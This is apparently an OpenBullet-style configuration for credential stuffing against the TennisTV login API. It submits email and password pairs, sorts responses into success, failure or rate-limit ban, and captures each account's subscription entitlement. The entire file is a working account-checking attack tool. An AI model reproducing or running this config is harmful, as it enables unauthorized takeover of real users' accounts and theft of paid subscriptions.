[SETTINGS]
{
  "Name": "TennisTV",
  "SuggestedBots": 1,
  "LastModified": "2018-07-20T13:40:34.162771+00:00",
  "AdditionalInfo": "",
  "Author": "v0ilawes",
  "Version": "1.0.0",
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
REQUEST POST "https://www.tennistv.com/api/users/v1/login" AutoRedirect=TRUE 
  CONTENT "{Email: \"<USER>\", Password: \"<PASS>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Success OR 
    KEY "<SOURCE>" DoesNotContain "Invalid username or password " 
  KEYCHAIN Failure OR 
    KEY "Invalid username or password " 
  KEYCHAIN Ban OR 
    KEY "\"Too many requests\"" 
PARSE "<SOURCE>" LR "entitlement\":\"" "\"" Recursive=FALSE -> CAP "Entitlement" "" "" 
